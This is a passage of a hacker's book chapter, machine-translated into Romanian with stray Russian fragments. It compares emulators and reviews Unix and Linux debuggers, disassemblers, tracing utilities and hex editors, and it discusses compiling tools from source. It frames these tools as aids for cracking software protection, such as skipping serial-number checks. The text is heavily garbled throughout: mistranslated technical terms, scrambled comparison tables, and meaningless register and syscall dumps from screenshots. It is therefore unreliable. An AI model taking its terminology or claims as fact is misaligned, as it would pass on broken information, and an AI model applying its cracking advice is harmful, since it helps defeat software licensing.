noiale acestei clase apar aproape în fiecare zi Unul dintre aceste produse este Parallels Work Station (Fig ) Editareafișierelor Vizualizare dispozitiv VM Ajutor Fig Parallels Emulator stației de lucru Capitolul Emulareadebugerilor și emulatorilor , astfel desupraveghetori exotici precum Trango, orientați spre rezolvarea sarcinilor reale de timp, de exemplu, cum ar fiprocesarea în schimbare rapidă a citirilor senzorilor Alegerea unui emulator adecvat atunci când alegeți un emulatoradecvat, hackerii sunt de obicei ghidați de următoarele criterii: securitate, extindere, deschidere a textelor inițiale,calitatea și viteza emulării, prezența unui debugger construit și flexibilitatea Mecanisme de lucru cu imaginiinstantanee Luați în considerare toate aceste puncte mai detaliat Protectarea prin lansarea unui program agresiv pe unemulator este foarte dificil să scapi de gândul că, în orice moment, se poate izbucni de controlul său, lăsând un trenlung de distrugere Să spunem doar că aceste temeri sunt destul de rezonabil Multe dintre emulatoare (DOSBOX, RS virtual) conțin „găuri” care permit codului emulat să apeleze direct lamemoria emulatorului în sine (de exemplu, să apeleze la funcțiile arbitrare ale sistemului de operare principal ARA înnumele său și cu el și cu acest lucru privilegii) Cu toate acestea, un emulator poate „rupe” doar un program specialconceput Interacțiunea în rețea este o altă problemă Emulația rețelei locale virtuale păstrează toate vulnerabilitățilesistemului de operare de bază, iar viermele de rețea îl poate ataca cu ușurință!Prin urmare, sistemul de operare de bazătrebuie să fie exclus din rețeaua locală virtuală Desigur, o astfel de soluție complică în mod semnificativ comunicareamașinilor virtuale cu lumea exterioară și, prin urmare, sunt adesea neglijate Apropo, firewall -urile personale în mareparte nu controlează rețelele virtuale și nu protejează împotriva invaziei Unele emulatoare vă permit să interacționațicu mașinile virtuale prin mecanismul folderelor comune, în timp ce folderul sistemului de operare al maestrului estevizibil ca un disc logic sau o resursă de rețea Cu toate avantajele acestei abordări, el este intuitiv neobișnuit și nuse găsește în hackerii din mediul hackerilor Nota din capitolul va lua în considerare mai multe opțiuni pentruatacuri fundamentate teoretic asupra emulatorului WMware și li se oferă recomandări pentru protecția împotrivalor Extinderea unui emulator orientat profesional ar trebui să susțină posibilitatea conectării modulelor externe caresimulează echipamentele non-standard (de exemplu, HASP) Acest lucru este valabil mai ales pentru studierea protecțieitipului de forță stele , interacționând direct cu echipamentul și atașat la acele caracteristici ale comportamentuluisău, pe care emulatoarele obișnuite chiar nu le suspectează Unele dintre emulatoare sunt extinse, altele nu Dar chiar șicel mai extensibil grad de manevrabilitate și profunzimea configurației sunt destul de mici și documentate superficial(dacă sunt documentate deloc) Acesta este probabil faptul că factorul de expansiune este cu adevărat necesar foarte,foarte puțini Emulatorii nu scriu pentru hackeri!E pacat!Disponibilitatea textelor inițiale Prezența textelororiginale compensează parțial calitatea scăzută a documentației și extinderea insuficientă a emulatorului Dacă programulexperimental refuză să fie efectuat sub un emulator, textele originale vor ajuta la înțelegerea situației și laeliminarea defectului În plus, suntem de părți I Revizuirea programelor de hacker poate echipa emulatorul cu toateinstrumentele de care avem nevoie De exemplu, acesta poate fi un zumăr de memorie sau un instrument de urmărire inversăcare vă permite să derulați programul în ordine inversă În cele din urmă, accesul la textele inițiale face posibilăadăugarea rapidă a comenzilor de mașină nedocumentate sau seturile de instrucțiuni ale noilor procesoare Din păcate,emulatoarele comerciale sunt distribuite fără texte inițiale, iar emulatoarele OpenSource nu au ieșit încă dinadolescență și nu sunt potrivite pentru rezolvarea problemelor grave Vai!„Lumea” este un sinonim pentru cuvintele„imperfecțiune”!Calitatea emululării este ce fel de escrocher din emulator dacă este imposibil să rulați moale peel?Puteți, desigur, să utilizați alți debuggeri (de exemplu, PLA Debgger), dar capacitățile lor sunt mult mai limitate,în plus, unele dintre programele protejate pur și simplu nu merg pe emulatoare cu calitate scăzută!Pentru a creșteviteza de emulare, mulți dintre dezvoltatori împrumută în mod deliberat setul de echipe emulate, susținând doar cele mairelevante dintre ele (în special aceasta se referă la echipe privilegiate ale regimului protejat, echipe de însoțirematematică, inclusiv „multimedia” și unele comenzi „rare -earth” ale regimului real) Registrele de birou, urmărireasteagurilor și alte oportunități similare rămân cel mai adesea neinvident Cu toate acestea, astfel de emulatoare suntpotrivite nu numai pentru lansarea jocurilor!Acestea pot fi utilizate ca zonă „carantină” pentru verificarea programelorproaspăt dovedite pentru viruși sau ca șoarece experimental pentru experimente cu același editor de disc În cea mai mareparte, emulatoarele comerciale folosesc mecanismele de emulație dinamică, emulând doar comenzi privilegiate și efectuândtot restul pe procesorul „viu” - în zona amurgului din spațiul de adrese izolate, înconjurat de gardul de pichet alporturilor virtuale, care nu numai că crește semnificativ productivitatea, dar adaugă automat suport pentru toateechipele multimedia noi (desigur, cu condiția ca procesorul dvs fizic să le susțină) Între timp, în procesareasituațiilor excepționale, impactul comenzilor asupra steagurilor, metode de adresare inacceptabile, emulatoare (chiardinamice!) De multe ori nu se comportă deloc ca un procesor real, iar codul de protecție poate afla!Cu toate acestea,dacă un program sigur nu funcționează în cadrul unui emulator, acest lucru va indigna foarte mult utilizatorii legali Programele protejate de debugger construite în toate modurile posibile rezistă la debuggeri, dizassemblers, amortizoareși alte arme de hackeri De regulă, nu atinge inelul zero, deși o anumită protecție, de exemplu, Themida (fostulprotector exterem) funcționează și acolo Există zeci, dacă nu chiar sute, modalități de a „orbi” un debugger și le estedificil să le reziste, mai ales dacă tocmai ați început să hack Puterea emulatorului este tocmai faptul că controleazăpe deplin codul executat, iar tehnicile obișnuite anti -canalizare nu funcționează la acesta În plus, restricțiilehardware pe procesorul emulat la emulator în sine nu se aplică În special, numărul de puncte „hardware” ale opririi nueste necesar să fie egal cu patru, ca pe platforma x Dacă este necesar, emulatorul poate susține o mie sau chiar unmilion de puncte de oprire, iar condițiile pentru declanșarea lor pot fi periculoase arbitrar (de exemplu, puteți venipe fiecare comandă JX în urma testului EAH, EAX corespunzător dacă ( My func ()) ) Desigur, pentru aceasta,emulatorul trebuie să fie echipat cu un debugger integrat Orice alt debugger lansat sub un emulator, de exemplu,Softice, nu primește avantaje suplimentare Posibilitățile debuggerilor integrați existenți sunt destul de mici Deregulă, acestea nu oferă o funcționalitate mai bună decât debug com și adesea GPAS Emularea debuggerilor și aemulatorilor sunt semnificativ inferioare față de el, așa că ar trebui să recurgă doar în cazuri extreme, cânddebuggerii obișnuiți nu mai pot face față Tabelul rezumat al caracteristicilor emulatoarelor, deci, ce emulator esteîncă de ales?Decizia corectă vă va ajuta să faceți un tabel rezumat al caracteristicilor emulatoarelor (tabelul ) Tabelul Сравнительная оценка характеристик наиболее популярных эмуляторов (неблагоприятные характеристикивыделены серым цветом) DOSBox Bochs Microsoft Virtual PC VMware Server Хеп Parallels WorkstationРазработчик Питер Веенст-ра (Peter Veenstra) и Sjoerd при содействии сообщества пользователей Кевин Лоутон(Kevin Lawton) Microsoft VMware Intel и AMD при Participarea Universității din Cambridge Cambridge CambridgeGroup Parallels Licență GPL LGPL Cod închis (uzină gratuită din iulie ) Cod închis (versiuni gratuite disponibile)GPL Cod închis (produs comercial) Cercul utilizatorilor DOS (în special jocuri) pentru iubitorii de jocuri, softwareDezvoltatori, administratori de sistem, lucrători de birou de jocuri, dezvoltatori de software, administratori desistem, lucrători de birou, testatori de jocuri, dezvoltatori de software, administratori de sistem, lucrători de birou,lucrători de birou, lucrători de birou, lucrători de birouTesteri de jocuri iubitori, dezvoltatori de software,administratori de sistem, lucrători de birou, testatori emulați procesoare Intel X Intel X , AMD Intel X IntelX , AMD corespunde unui procesor instalat fizic (asistență sunt acceptate de Intel X , AMD , IA- ) acolo nu esteimplementat implementat, dar llanius-este în urmăSIIY SISTEME DE BAZĂ DE BAZĂ GNU/Linux, Windows, Mac OS X, Mac OSClassic, Beos, FreeBSD, OpenBSD, Solaris, Qnxjrix Windows, Linux, Beos, Irix, AIC Windows Windows, Linux Linux, NetBSDWindows, Mac, Mac, Mac, Mac (Intel version) Официально поддерживаемые гостевые ОС Внутренняя эмуляция DOS DOS,Windows, Linux, xBSD DOS, Windows, OS/ DOS, Windows, Linux, FreeBSD, Netware, Solaris Windows ХР and Server, Linux, FreeBSD, NetBSD, OpenBSD DOS, Windows, Linux, FreeBSD, OS/ , Solaris, rata de emulare în comparație cusistemul principal este extrem de scăzut ridicat, abordează viteza sistemului principal, abordează viteza sistemuluiprincipal, abordează viteza Sistemul principal Capitolul Instrumente de hackeri pentru UNIX și Linux Din punctul devedere al hackerului, alegerea utilităților de cooperare specifice pentru UNIX și Linux este mică În orice caz, estesemnificativ mai mic decât alegerea utilităților similare în lumea Windows Hackerii trebuie să își facă munca cu aproape„mâini goale”, iar acest lucru necesită o perseverență corectă și o muncă asiduă Cel mai mult deprimat de lipsa unuidebugger egal în capacitățile sale, dacă nu chiar softice, atunci cel puțin Ollydbg Practic, nu există amortizoare dememorie, modificatori (patch -uri), de nepătruns de memorie, modificatori (patch -uri), nepachete automate alefișierelor ambalate în rețea, doar cimitire interminabile ale proiectelor abandonate Prin urmare, astfel deutilități trebuie să scrie singure Să sperăm că prin asta Timp de câțiva ani, situația se va schimba, deoarece, după cum știți, cererea dă naștere unei propuneri Între timp, nelimităm la o scurtă revizuire a instrumentelor disponibile și, de asemenea, luăm în considerare unele metode carecompilează manual proiecte abandonate și nu mai susțin Notă pentru programatorii Unix, de regulă, nu este caracteristicpentru „fixarea” sursei, iar marea majoritate a programelor (inclusiv cele luate în considerare în acest capitol) serăspândesc în acest fel, mulți utilizatori încearcă să descarce ansambluri binare gata de utilizare, Adesea, chiar șifără să ghicească, ce oportunități se găsesc în a doua parte a acestui capitol, „potențialul ascuns al ansamblurilormanuale”, vor fi date și tehnici care puteți crește funcționalitatea utilităților de hackeri Unix dacă nu suntețisatisfăcut Cu setul de funcții furnizate de Fișiere Executabile Ready To Utilizabile în primul rând, GDB, debuggerul cuplatformă încrucișată (Debugger la nivel de sursă), bazat pe biblioteca PTRACE și orientat în principal pe aplicațiilede depanare furnizate cu texte sursă, merită Pentru hacking -ul aplicațiilor protejate, nu este prea potrivit Debuggerulacceptă hardware -ul opririi pentru execuție Punctele opririi pentru citirea/înregistrarea memoriei atunci când pornițide sub VMware nu funcționează În plus, GDB nu face posibilă setarea punctelor opririi pe o memorie consiliabilă în comunși să o modifice (acest lucru înseamnă că este cu greu posibil să depanați o utilitate cu acesta) Căutarea în memorieeste absentă ca atare Debuggerul refuză să încarce un fișier cu o structură distorsionată sau cu o secțiune absentă asecțiunilor În exterior, este o aplicație de consolă (Fig ) cu un sistem complex dacă nu sunteți familiarizat cuaceastă bibliotecă, apoi citiți mai întâi documentația minimă necesară despre aceasta, oferind comanda ManPTRACE Capitolul Instrumente de hacker pentru echipe UNIX și Linux , a căror descriere completă ocupă aproximativtrei sute de pagini de text de curățare Dacă se dorește, la debugger poate fi adăugată o coajă grafică (nu este nevoiesă experimentați o deficiență), cu toate acestea, deficiențele enumerate nu pot fi corectate cu o interfață frumoasă Întimpul existenței sale, GDB a reușit să formeze un număr imens de tehnici anti -vegetabile, multe dintre ele rămânândrelevante pentru astăzi Avantajele GDB includ gratuit Acest debugger este distribuit în funcție de licența GNU (de undeși numele său - debugger GNU) și este inclus în kitul celor mai multe distribuții UNIX În cele din urmă, cu acesta,puteți aplica patch -uri pe fișierul executabil fără a părăsi debuggerul Orez Nota de debugger GDB este un mic sfatpentru cei care încep doar să lucreze cu GDB: să stabilească punctul programului prins până la punctul de a intra înpunctul de intrare, este necesar să se stabilească mai întâi adresa sa În acest scop, utilitatea standard Objdump (numai pentru fișiere neprotejate!) Sau o combinație a editorului hexadecimal Biew și IDA Pro Dizassembler vor veni laîndemână Așadar, pentru a atinge obiectivul, dați comanda Objdump File Name - F, apoi descărcați programul depanat înGDBZ (gdb -g file name) și dați pauza *comanda okhkhhhhhh, unde OKHH este adresa de pornire, apoi executați Programuldepanat pentru a executa comanda RUN Dacă totul a mers cu succes, GDB se va opri imediat, trecându -vă frâieleguvernului Dacă acest lucru nu se întâmplă, deschideți fișierul cu ajutorul al șaisprezecelea Utilitatea Objdump esteun analog al utilității de dumpbin de la Microsoft, dar proiectat pentru fișierele ELF (structura de format ELF estedescrisă mai detaliat în capitolul , "DISSASMBING ELF Files Files pentru Linux și BSD ") Objdump conține un simpludizassembler Utilitatea necesită disponibilitatea obligatorie a unui tabel de secțiuni, nu poate interpreta câmpuriledistorsionate și nu face față fișierelor ambalate Cu toate acestea, în absența IDA Pro, ea se va potrivi și ea Maimulte informații despre utilizarea acestei combinații vor fi date în acest capitol (Apoi reporniți debuggerul și după atingerea punctului de oprire, restaurațiconținutul său (set {char} * xxxxxxxxxx = yy) Debuggerul ALD (Debugger Language Asemană) este un debugger la nivelaplicat rapid, axat pe depanarea textelor de asamblare și a fișierelor binare (Fig ) Îl puteți descărca lahttp://ld sourceforge net/ ALD se bazează pe biblioteca PTRACE cu toate consecințele care urmează În prezent,funcționează doar pe platforma X Debugger Compilat cu succes pentru lucrări sub controlul următoarelor sisteme de operare: Linux, FreeBSD, NetBSD și OpenBSD Elsusține punctele de oprire pentru execuție, pas-by-va/umil tracer, depozite de vizualizare/editare,spațiozitate/schimbare a registrelor și conține un simplu dizassembler Un set destul de ascetic de funcții!Pentrucomparație, chiar și venerabilul debug com pentru MS-DOS și a oferit un set mai larg de oportunități Dar ALD estegratuit, distribuie în textele sursă și, mai important, nu refuză să încarce fișiere în care nu există un tabel desecțiuni Este destul de potrivit pentru învățarea hackingului, dar, din păcate, nu se bazează pe instrumentul principalal hackerului Orez Debuggerul ALD la locul de muncă este un alt debugger interesant al nivelului inițial-tipul(http://the-dude sourceforge net/) El lucrează ocolind Ptrace și își îndeplinește cu succes sarcinile în care GDB și ALDnu mai pot face față Din păcate, funcționează doar sub Linux, iar fanii restului clonelor UNIX nu pot invidiadecât Arhitectural, tipul este din trei părți principale: modulul nucleului Dude o, care implementează funcții dedepanare cu nivel scăzut de nivel scăzut, care împerechează „învelișul” bibliotecii în jurul acesteia - libduderino so,precum și o interfață de utilizator externă - DDBG De fapt, este mai bine să rescrieți interfața de utilizatorimediat Debuggerul este gratuit, dar pentru a descărca necesită pre -înregistrare pe site -ulhttp://www sourceforge net Linice (http://www linice com/) este un debugger nuclear extrem de puternic, axat pe lucrulcu fișiere binare fără coduri sursă De fapt, este un analog al softice -ului pentru Linux (Fig ) Acest debugger esteprincipalul instrument al oricărui hacker care lucrează sub Linux În prezent, funcționează doar pe nucleul versiunii (și, probabil - ), dar compilarea pentru toate celelalte nuclee se încheie în eșec din cauza erorii în fișierulIceFace c Debuggerul adaugă un sistem /ICE /ICE la sistem, ceea ce este ușor pentru despre editorul Hexadecimal Biewva fi puțin mai multe detalii în acest capitol Capitolul Instrumente de hacker pentru UNIX șiLinux îi emite prezența Cu toate acestea, din cauza prezenței textelor originale,aceasta nu reprezintă o problemă gravă Aparând apăsând combinația de tastatură + , iar tasta USB nu a fost încăacceptată Nu există niciun bootloader și nu este încă așteptat, așa că singura modalitate de depanare este introducereacomenzii Machine în OZ (OPCOD CCH) în punctul de intrare cu restabilirea manuală ulterioară a conținutului original Wed Dec, : rm : B> : b> : c ѳ cu E -A ?FC FF C E ■> : B Cѳ - OS E IA C : E BB E F -C D : C ѳ C C C E - FCFF C OS FF : MOU EAX, [ESI+ ] : ?„ : C D> = : : > : CO O F T» : ■> : JZ Call JMP LA și SHB ADC с ED ] [ESI]] + OI, BLBYTE PTB [EAX+ ѳI C AL, AL [root@localHost -]# xwd -Ut -ROOT LINICE [root@localhost - # i fig Nu, acesta nu este unvis, acesta este un analog al Softice sub Linux!File Edit Vizualizare filele terminale Ajutor Editare fișiereVizualizare Funcții Emulare EAX EBX ECX EDX EFLAGS x x x x x EBP ESI EDIEDI EIP x x x x x DE TAP [RUN т CURSOR] J JAP ] [JUMPTO, |Rulați[segmente] [PUSH DATA J FFFF : B Ă B FIG Panoul principal de emulator este Partea I Revizuirea programelor hacker Pice (http://pice sourceforge net/) este un depanator nuclear experimentalpentru Linux, care funcționează doar în modul console și implementarea unui minim de funcții Cu toate acestea, și poateveni cu ceva În cele din urmă, emulatorul x (Fig ), care poate fi descărcat lahttp://ida-x emu sourceforge net/-Test este un depanger emulat, efectuat structural sub forma unui plugin pentru IDAPro și răspândirea în sursă Texte fără pre-compiling Principalul avantaj al emulatorului este că vă permite săefectuați fragmente arbitrare de cod pe un procesor virtual De exemplu, cu acesta, puteți transfera gestionareanumărului de serie/ a parolei verificând procedura, ocolind restul codului O astfel de tehnică combină cele mai bunecaracteristici ale analizei statice și dinamice, simplificând foarte mult hacking -ul protecției complexe DizassemblersIda Pro (http://www datarescue com/idabase) - cel mai bun Dizassembler din toate timpurile, acum disponibil pentruLinux!Fanii FreeBSD și alte sisteme de operare pot fi mulțumiți Versiunea Windows console (Fig ) lansată sub un emulator sau lucrează cu ea direct de sub MS-DOS, OS/ sauWindows Până de curând, IDA Pro a refuzat să dea dosaruri fără un tabel de secțiuni, dar în cele mai recente versiuni,acest dezavantaj a fost eliminat Absența debuggerilor demni sub UNIX transformă IDA Pro în instrumentul principal alCracker Aceasta înseamnă că, pe lângă IDA Pro, veți avea nevoie în plus de IDA Pro SDK, care este furnizat numaipentru versiunile comerciale ale IDA Pro GPAVA Hacker TompeMara pentru UnixLinux Dacă nu aveți ocazia să obțineți IDA Pro,atunci poate unul dintre următoarele dizassemblers vă va atrage atenția: P P BASTARD DISSMBLER(http://bastairrd sourceforge net/) - dizassembler (sau, mai precis, mediul de dezasamblare) pentru Linux șiFreeBSD Acest mediu DizAssemble oferă un interpret (prin analogie cu Perl sau Python), cu care puteți descărca șidescărca fișiere, salvați depozitele de cod DizAssembled Oferă posibilitatea de a scrie macro -uri P LIDA (LinuxInteractive DisAssembler) este un dizassembler interactiv care oferă o serie de funcții specializate (de exemplu,criptanizator) Pagina principală a proiectului - http://iida sourceforge net P ldasm (Linux DisAssembler) este o coajăgrafică pentru objdump/binutile, imitând comportamentul W Dasm Dizassembler menționat în capitolul Puteți descărcaLDASM la http://www fedface com/projects/ldasm html Spionii Truss sunt o utilitate utilă care este inclusă în modregulat în setul de majoritatea distribuțiilor UNIX Syscalls (semnale) (semnale), realizate de un program experimentalde la un nivel aplicat (Fig ), ne permite să spunem multe despre lumea interioară a mecanismului deprotecție Orez Apelurile sistemului de urmărire folosind Truss Un exemplu de raport creat de utilitatea Truss esteprezentat în lista Ptoar ( x x x , x ) pauză ( x s ) pauză ( x s ) pauză ( x d ) pauză( x e ) = ( x s ) stat ("" ", Oxbbbff ) = ( x ) = ( x ) ( x ) = ( x ) = ( x ) = ( x )Partea I Revizuirea programelor de hackeri Opo (" , ) FCHDIR ( x ) OPO (" ", , ) STAT (" ", Oxbfbfff d ) opO(" ", , ) fstat ( , oxbfff d ) fcntl ( x , x , x ) sysctl (oxbfbffbffffpfffffffff x x )) Break ( x f )GetDirentnes ( x , x e x x A B ) GETDIRENTRIES ( x , x E x x A B ) LSeek ( , x , ) Close( ) FCHDIR ( x ) FCHDIR ( x ) FCHDIR ( x ) FCHDIR ( x ) FCHDIR ( x ) FCHDIR ( x ) FCHDIR ( ( ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x )= ( x ) = ( x ) = ( x ) = ( x ) = ( x ) x ) = ( x ) = ( x e) Ieșire proces, rval = kTrace - Un altutilitar dintr -un set de livrare standard Monitorizează apelurile sistemului, nume sintactice ale numelor (nTraducereAmes), operațiuni de intrare-ieșire, semnale, urmărirea modului utilizatorului și comutarea contextului, efectuate deprogramul studiat de la nivelul nuclear Cu alte cuvinte, KTrace este o versiune îmbunătățită a Truss, dar spre deosebirede acesta din urmă, KTrace emite un raport nu în text, ci forma binară (lista ) Prin urmare, pentru a generarapoarte, trebuie să utilizați utilitatea KDUMP Udистинг KTrace Call Write ( x , oxbfbff fc, x ) KTrace"KTrace:" Gio Fd a scris BYTES KTRACE RET WRITE KTRACE CALL WRITE ( x , Oxbfff c, x ) KTRAC "FD a scris BYTES KTRACE RET WRITE / x KTRACE CALL WRITE ( x , oxbfbff ec, x ) Ktrace Gio Fd ascris bytes KTrace Ret Write KTRACE CALL WRITE ( x , Oxbfbfff ec, Oxla) KTRACE KTRACE "Nu există unastfel de fișier GIO FD nu a scris de octeți sau director KTRACE RET WRITE / xLA KTRACE CALLSIGPROCMASK ( x , x CBE , OXBFBFA ) KTRACE RET SIGPROCMASK KTRACE CALL SIGPROCMASK ( x , x c KTRACE CALL EXIT ( x ) KTRACE RET KTRACE Editorii hexadecimali sunt cei mai puternici dintre editoriihexadecimali sunt editorul universal al ediției menționate în capitolul Sau, care acceptă atât Windows, cât și Linux,și Biew (http://belnet dl sourceforge net/sourceforge/biew/biew tar bz ) este un instrument hexagonal pentru editorulUNIX și Linux Combinarea funcțiilor Dizassembler, Encoder și inspector al fișierelor de format ELF (Fig ) Nuexistă un asamblator construit, deci Este necesar să lucrați direct în codul mașinii, care nu este prea convenabil Cu toate acestea, nu avem altă opțiune (cuexcepția pentru a adăuga asamblator pe cont propriu) Orez The hexadecimal editor of Biew from other hexadecimaleditors should be mentioned by ghex (http://directory fsf org/ all packages in directory/ghex html) - a hexagonal editorfor gnome and khexedit (http://hoine online nep Index html) este un editor hexadecimal destul de flexibil pentru KDE,care afișează date în formate hexadecimale, octale, binare și text Pentru a lucra cu fișiere mari ( MB sau mai mult),editorul experimental Hview (până acum este disponibil doar prin versiunea beta), care poate fi descărcată lahttp://tdidort esmartdesign com/zips/hview tgz, este potrivit În plus, vorbind despre editori hexadecimali pentru UNIXși Linux, nu uitați de Emacs, care, împreună cu alte funcții, include un editor hexadecimal Amortizoarele din UnixConținutul memoriei fiecăruia dintre procesoare sunt prezentate sub forma unui set de fișiere situate în catalog/RGS Contextul registrelor și altor informații este de asemenea stocat aici Cu toate acestea, memoria de dump nu esteîncă un fișier ELF gata pregătit și nu este potrivit pentru utilizare directă Cu toate acestea, este destul de posibilsă se simtă în mod obișnuit la imaginea sa „brută” Potențialul ascuns al ansamblurilor manuale, așa cum este menționatla începutul acestui capitol, marea majoritate a software -ului pentru UNIX și Linux sunt distribuite nu numai sub formăde ansambluri pregătite, ci și în codurile sursă Cu toate acestea, majoritatea utilizatorilor obișnuiți preferă sădescarce a -a parte pe care am gata să o folosesc De ce fac asta?Da, pur și simplu nu vor să sufere, comparândprogramul manual Cu toate acestea, nu vă grăbiți să-i învinovățiți imediat pentru lene, spunând că utilizareaansamblurilor gata făcute nu este „Unix-WAR” și deloc într-un hackie Iată o serie de motive pentru care ansamblurileterminate se dovedesc uneori mai bune decât textele originale: p Ansamblul finisat are un volum mult mai mic decâttextele originale, chiar comprimate de cel mai bun arhivar Astfel, este profitabil să le descărcați dacă economisiți întrafic sau dețineți o conexiune la internet lentă (în special apelare) În plus, nu trebuie să uităm că nu fiecare serveracceptă doc P În formă inutilă, textele inițiale ocupă o cantitate semnificativă de spațiu pe disc, iar compilarea însine necesită un timp semnificativ, care, după cum știți, funcționează întotdeauna împotriva noastră P „Manual”Configurarea programului necesită o citire atentă a manualelor și studierea scripturilor de configurare Cert este căasamblarea cu opțiuni implicite în cel mai bun caz nu este diferită de ansamblul oficial P Destul de des este necesar sădescărcați fișiere și biblioteci suplimentare, actualizați compilatorul și așa mai departe Toate acestea necesită, deasemenea, timp și, de asemenea, consumă spațiu de trafic și disc P Calitatea instalatorilor automați lasă de obicei multde dorit, iar programul compilat trebuie finalizat mult timp □ Ansamblurile gata includ de obicei „bonusuri”, deexemplu, scheme de culori non -standard sau componente suplimentare create de dezvoltatorii din al treilea -part (Fig ) În textele oficiale de început ale unor astfel de „bonusuri” nu poate fi Orez Interfața grafică a debuggeruluiintegrat al emulatorului Bochs, care face parte dintr -unul dintre ansamblurile neoficiale Capitolul HakerInstrumente pentru UNIX și Linux Fig Asamblarea oficială a emulatorului Bochs nu acceptă arhitecturile X - ,astfel încât versiunea pe de biți a Linux spune că, scuze, CPU-ul dvs nu este capabil să ruleze kernel pe debiți, iar descărcarea se oprește (sistemul oprit) Fi 'O'X-' W -Kiiaâț fig După compilarea încrucișată cu cheia-Versiunea Linux-Versiunea Linux pe de biți începe fără probleme și funcționează cu o viteză decentă, chiar dacă Bochsîn sine este lansat de sub VMware pe Pentium III Partea I Recenzie de programe de hacker □ Există întotdeauna omie de motive prin care a asamblat manual programul va funcționa incorect sau instabil Imaginează -ți, de exemplu, osituație în care utilizatorul activează o opțiune seducătoare care nu a fost încă finalizată și se află în etapa „înconstrucție” Acest lucru poate duce cu ușurință la apariția glitches -urilor în cele mai neașteptate locuri □ Programelecolectate manual sunt mult mai dificil de eliminat din sistem decât pachetele RPM (cu toate acestea, există utilitățicare automatizează acest proces) □ Dacă opțiunile de care aveți nevoie sunt absente în ansamblul oficial, cum ar fi, deexemplu, suport pentru arhitectura x - în emulatorul Bochs (Fig ), atunci puteți găsi aproape întotdeauna unansamblu neoficial în care această deficiență este eliminată ( Fig ) Este adevărat, este demn de remarcat faptul cănu toate adunările neoficiale sunt colectate dreapta □ Proverbul „este mai bine să zboare într -o zi decât să alerge într -o lume corporativă aspră într -o zi, iardacă adunarea finalizată este garantată să funcționeze cumva, atunci nimeni nu va plăti pentru compilarea manuală a SUA„pentru așa ceva ” Dar acum vom lua în considerare principalele motive pentru care textele de pornire sunt mai bune decâtdistribuțiile pregătite □ Ansamblurile nu există pentru toate platformele Acest lucru este valabil mai ales pentruplatformele X - și pentru sistemele de operare precum QNX sau BEOS □ Pentru versiunile experimentale alfa și beta,ansamblurile gata pregătite sunt aproape întotdeauna absente, iar pentru versiunile stabile curente merg rar Prinurmare, dacă nu vă implicați în ansambluri manuale, de multe ori va trebui să lucrați cu versiuni de acum un an sau doiani (și acest lucru este departe de exagerare!), Privind colegii cu invidie, care au colectat ultima alfa cu o Un numărimens de „bunătăți” și inovații □ Ansamblurile gata nu includ toată funcționalitatea implementată în textele sursă (înspecial, popularul emulator Bochs include un depanger interactiv extern în stilul de depanare Turbo, în timp ceansamblurile oficiale conțin cel mai simplu debug integrat în stilul debug com) □ Pentru multe programe, există extensiicreate de dezvoltatorii din al treilea -party și instalate doar prin compilare încrucișată □ Ansamblul finit includeadesea multe componente suplimentare care consumă doar resurse de procesor și memorie, dar personal nu aveți nevoie deacesta personal În special, programul poate suporta consola și interfețele grafice Dacă doriți să lucrați doar cu liniade comandă și nu intenționați să utilizați membranele grafice, atunci motivul direct pentru a traversa programul fărăsuport GUI □ Ansamblurile oficiale sunt compilate cu opțiuni de optimizare standard comune tuturor procesoarelor În urmaacestui fapt, codul este ineficient și non -optim În unele cazuri, poate fi complet nefuncțional (pe procesoarele vechi sau ) □ Când noua versiune este lansată, întregul ansamblu trebuie descărcat integral, în loc să ridice doarfișiere modificate (rețineți că acest lucru este relevant pentru programele adesea actualizate) □ Dacă programul conținevulnerabilitate, atunci atacarea ansamblului finit este mai ușoară, deoarece atacatorul cunoaște locația exactă atuturor comenzilor mașinii și a aspectului memoriei □ Patch -urile la textele sursă merg mult mai rapid și mai des decâtla ansamblurile terminate (de multe ori este imposibil să aplici un plasture pe ansambluri pregătite și trebuie sădescarci întreaga distribuție „stratificată” a întregului) De aceea, mulți utilizatori preiau programe de programe, dardoar câțiva o fac corect} La prima vedere, poate părea că asamblarea manuală este disponibilă pentru orice capitol Hacker Instrumente pentru UNIX și Linux , careau o experiență minimă cu compilatoare, deoarece precum și deține o cantitate suficientă de timp liber și capacitatea dea citi engleza fără ajutorul traducătorilor Acest lucru este adevărat, dar doar parțial De fapt, asamblarea manuală esteun proces destul de complicat, contradictoriu reciproc și neobișnuit, pe care acum vom încerca să -l luăm înconsiderare Rețineți că aici nu există soluții universale!Fiecare cale conține dezavantajele și plusurile sale Reținețidacă nu aveți încă o experiență suficientă în domeniul ansamblului manual, atunci cea mai bună abordare va firespectarea următoarelor recomandări simple mai întâi descărcați ansamblul finalizat, lucrați puțin cu programul,tratați structura cataloagelor și stați În jos, cu capacitățile de bază, atunci puteți trece la experimente cel puțincorect, corect, standardul asamblat va fi întotdeauna în fața ochilor dvs dacă compilarea nu va merge la fel cum seaștepta sau dacă programul asamblat refuză să funcționeze, asamblarea de referință Va ajuta la stabilirea a ceea ce afost făcut nu atât de filosofic, compilarea programului începe întotdeauna cu citirea instrucțiunii Accesați site -ulweb al proiectului, accesați secțiunea Descărcări, descărcați protocolul de schimbare (modificări, ce este nou, readme)și citiți -le gânditor Acest lucru este necesar pentru a afla cum aveți versiunea pe care o aveți de la descărcarea șidacă aveți nevoie de toate aceste inovații Practica arată că multe programe se opresc în dezvoltarea lor chiar și înconcepție, iar apoi „Liven”, crescând funcționalitatea excesivă Trebuie să alung moda și progresul, încercând săfolosesc cele mai recente versiuni de programe, doar pentru că sunt „cele mai recente”?Codul mașinii, spre deosebire delapte, nu se deteriorează și nu acru, iar hackerii, spre deosebire de utilizatorii obișnuiți, sunt mult maiconservatori De obicei, sunt foarte neîncrezători de tot ce este nou După cum a spus unul dintre ei, „Nu pot lucra cainstrument, care este îmbunătățit în mâna mea ”Utilizatorii în această privință sunt mult mai „progresivi” și pompează tot ceea cese încadrează doar în domeniul viziunii lor În același timp, există o prejudecată stabilă printre care este cel mai binesă descărcați ramuri stabile (stabile), numite și lansări (eliberare), spun ei, funcționează mult mai fiabil decâtversiunile experimentale alfa/beta Există un fel de adevăr în acest sens Cu toate acestea, în general, lucrurile suntcomplet greșite Versiunile stabile apar rar În acest timp, acestea conțin bug -uri, eliminate sistematic în versiunileintermediare, purtând starea de „instabil” În pauzele dintre luptele cu bug -uri, dezvoltatorii adaugă noifuncționalități (sau le extind pe cele existente) De exemplu, poate fi implementat suport pentru protocoale avansate detransfer de date sau noi formate de fișiere Care este rostul de a aștepta lansarea când versiunea curentă poate fidescărcată chiar acum?În plus, 